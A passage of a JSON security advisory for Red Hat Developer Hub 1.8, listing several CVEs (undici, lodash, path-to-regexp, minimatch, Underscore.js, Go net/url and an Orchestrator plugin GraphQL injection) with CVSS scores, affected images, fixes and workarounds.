"NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "undici: Undici: Denial of Service via invalid WebSocket permessage-deflate extension parameter"}, {"acknowledgments": [{"names": ["Thibault Guittet"]}], "cve": "CVE-2026-3118", "cwe": {"id": "CWE-89", "name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')"}, "discovery_date": "2026-02-24T12:08:42.955000+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2442273"}], "notes": [{"category": "description", "text": "A security flaw was identified in the Orchestrator Plugin of Red Hat Developer Hub (Backstage). The issue occurs due to insufficient input validation in GraphQL query handling. An authenticated user can inject specially crafted input into API requests, which disrupts backend query processing. This results in the entire Backstage application crashing and restarting, leading to a platform-wide Denial of Service (DoS). As a result, legitimate users temporarily lose access to the platform.", "title": "Vulnerability description"}, {"category": "summary", "text": "rhdh: GraphQL Injection Leading to Platform-Wide Denial of Service (DoS) in RH Developer Hub Orchestrator Plugin", "title": "Vulnerability summary"}, {"category": "other", "text": "This MODERATE impact vulnerability in the Orchestrator Plugin of Red Hat Developer Hub (Backstage) allows an authenticated attacker to cause a platform-wide Denial of Service. By injecting specially crafted input into GraphQL API requests, an attacker can disrupt backend query processing, leading to the application crashing and restarting. This issue temporarily prevents legitimate users from accessing the platform.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-3118"}, {"category": "external", "summary": "RHBZ#2442273", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442273"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-3118", "url": "https://www.cve.org/CVERecord?id=CVE-2026-3118"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3118", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3118"}], "release_date": "2026-02-24T00:00:00+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "To mitigate this issue, restrict network access to the Red Hat Developer Hub instance to trusted users and networks only. This limits the exposure of the vulnerable Orchestrator Plugin to unauthorized access.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Moderate"}], "title": "rhdh: GraphQL Injection Leading to Platform-Wide Denial of Service (DoS) in RH Developer Hub Orchestrator Plugin"}, {"cve": "CVE-2026-4800", "cwe": {"id": "CWE-94", "name": "Improper Control of Generation of Code ('Code Injection')"}, "discovery_date": "2026-03-31T20:01:21.918257+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2453496"}], "notes": [{"category": "description", "text": "A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().", "title": "Vulnerability description"}, {"category": "summary", "text": "lodash: lodash: Arbitrary code execution via untrusted input in template imports", "title": "Vulnerability summary"}, {"category": "other", "text": "In the context of Red Hat Enterprise Linux, the grafana and grafana-pcp packages execute the affected JavaScript entirely client-side within the user's browser. Consequently, the attack surface is strictly restricted to the local browser environment.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-4800"}, {"category": "external", "summary": "RHBZ#2453496", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2453496"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4800", "url": "https://www.cve.org/CVERecord?id=CVE-2026-4800"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"}, {"category": "external", "summary": "https://cna.openjsf.org/security-advisories.html", "url": "https://cna.openjsf.org/security-advisories.html"}, {"category": "external", "summary": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", "url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm"}, {"category": "external", "summary": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", "url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c"}], "release_date": "2026-03-31T19:25:55.987000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "lodash: lodash: Arbitrary code execution via untrusted input in template imports"}, {"cve": "CVE-2026-4926", "cwe": {"id": "CWE-1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2026-03-26T20:03:28.427630+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2451867"}], "notes": [{"category": "description", "text": "A flaw was found in path-to-regexp. A remote attacker could exploit this vulnerability by providing specially crafted input that generates a regular expression with multiple sequential optional groups. This leads to an exponential growth in the generated regular expression, causing a Denial of Service (DoS) due to excessive resource consumption.", "title": "Vulnerability description"}, {"category": "summary", "text": "path-to-regexp: path-to-regexp: Denial of Service via crafted regular expressions", "title": "Vulnerability summary"}, {"category": "other", "text": "This is an Important flaw in `path-to-regexp` that can lead to a Denial of Service. The vulnerability occurs when specially crafted input containing multiple sequential optional groups is used to generate regular expressions, causing exponential resource consumption.\n\nThe Red Hat Advanced Cluster Security is not affected by this issue since it's shipping a `path-to-regexp` version which doesn't contain the vulnerable code.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-4926"}, {"category": "external", "summary": "RHBZ#2451867", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451867"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4926", "url": "https://www.cve.org/CVERecord?id=CVE-2026-4926"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"}, {"category": "external", "summary": "https://cna.openjsf.org/security-advisories.html", "url": "https://cna.openjsf.org/security-advisories.html"}], "release_date": "2026-03-26T18:59:38+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "To mitigate this vulnerability, limit the use of multiple sequential optional groups in route patterns within applications that use `path-to-regexp`. Additionally, avoid directly passing user-controlled input as route patterns to prevent the generation of maliciously crafted regular expressions.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "path-to-regexp: path-to-regexp: Denial of Service via crafted regular expressions"}, {"cve": "CVE-2026-25679", "cwe": {"id": "CWE-1286", "name": "Improper Validation of Syntactic Correctness of Input"}, "discovery_date": "2026-03-06T22:02:11.567841+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2445356"}], "notes": [{"category": "description", "text": "The Go standard library function net/url.Parse insufficiently validated the host/authority component and accepted some invalid URLs by effectively treating garbage before an IP-literal as ignorable. The function should have rejected this as invalid.", "title": "Vulnerability description"}, {"category": "summary", "text": "net/url: Incorrect parsing of IPv6 host literals in net/url", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-25679"}, {"category": "external", "summary": "RHBZ#2445356", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445356"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-25679", "url": "https://www.cve.org/CVERecord?id=CVE-2026-25679"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25679"}, {"category": "external", "summary": "https://go.dev/cl/752180", "url": "https://go.dev/cl/752180"}, {"category": "external", "summary": "https://go.dev/issue/77578", "url": "https://go.dev/issue/77578"}, {"category": "external", "summary": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk", "url": "https://groups.google.com/g/golang-announce/c/EdhZqrQ98hk"}, {"category": "external", "summary": "https://pkg.go.dev/vuln/GO-2026-4601", "url": "https://pkg.go.dev/vuln/GO-2026-4601"}], "release_date": "2026-03-06T21:28:14.211000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}, {"category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Important"}], "title": "net/url: Incorrect parsing of IPv6 host literals in net/url"}, {"cve": "CVE-2026-26996", "cwe": {"id": "CWE-1333", "name": "Inefficient Regular Expression Complexity"}, "discovery_date": "2026-02-20T04:01:11.896063+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2441268"}], "notes": [{"category": "description", "text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.", "title": "Vulnerability description"}, {"category": "summary", "text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns", "title": "Vulnerability summary"}, {"category": "other", "text": "Exploitation of this flaw requires that a user or service processes untrusted input.", "title": "Statement"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-26996"}, {"category": "external", "summary": "RHBZ#2441268", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996", "url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"}, {"category": "external", "summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5", "url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"}, {"category": "external", "summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26", "url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"}], "release_date": "2026-02-20T03:05:21.105000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "restart_required": {"category": "none"}, "url": "https://access.redhat.com/errata/RHSA-2026:9742"}], "scores": [{"cvss_v3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1"}, "products": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "threats": [{"category": "impact", "details": "Moderate"}], "title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"}, {"cve": "CVE-2026-27601", "cwe": {"id": "CWE-606", "name": "Unchecked Input for Loop Condition"}, "discovery_date": "2026-03-03T23:01:58.011378+00:00", "flags": [{"label": "vulnerable_code_not_present", "product_ids": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}], "ids": [{"system_name": "Red Hat Bugzilla ID", "text": "2444247"}], "notes": [{"category": "description", "text": "A flaw was found in Underscore.js, a JavaScript utility library. This vulnerability allows a remote attacker to trigger a Denial of Service (DoS) attack by providing specially crafted recursive data structures. When these structures are processed by the _.flatten or _.isEqual functions, which lack a depth limit for recursion, a stack overflow occurs. This can make the application unavailable to legitimate users.", "title": "Vulnerability description"}, {"category": "summary", "text": "Underscore.js: Underscore.js: Denial of Service via recursive data structures in flatten and isEqual functions", "title": "Vulnerability summary"}, {"category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability"}], "product_status": {"fixed": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:bb763e2b7a9d101f73b03b9e1c5688e7034fd9d31413e890817bd4098a7d42f9_amd64"], "known_not_affected": ["Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:b40f228ed49b81e675763d0bb1e38e7a45c45eef8003237abfbddbfb952bb331_amd64", "Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:f09d63af77eec6b131067a08b1bd3a8c7673f9e68325bfde1ae081f85d73598c_amd64"]}, "references": [{"category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2026-27601"}, {"category": "external", "summary": "RHBZ#2444247", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444247"}, {"category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2026-27601", "url": "https://www.cve.org/CVERecord?id=CVE-2026-27601"}, {"category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27601"}, {"category": "external", "summary": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4", "url": "https://github.com/jashkenas/underscore/commit/411e222eb0ca5d570cc4f6315c02c05b830ed2b4"}, {"category": "external", "summary": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84", "url": "https://github.com/jashkenas/underscore/commit/a6e23ae9647461ec33ad9f92a2ecfc220eea0a84"}, {"category": "external", "summary": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw", "url": "https://github.com/jashkenas/underscore/security/advisories/GHSA-qpx9-hpmf-5gmw"}], "release_date": "2026-03-03T22:38:38.955000+00:00", "remediations": [{"category": "vendor_fix", "date": "2026-04-22T14:56:38+00:00", "details": "For more about Red Hat Developer Hub, see References links", "product_ids": ["Red Hat Developer Hub 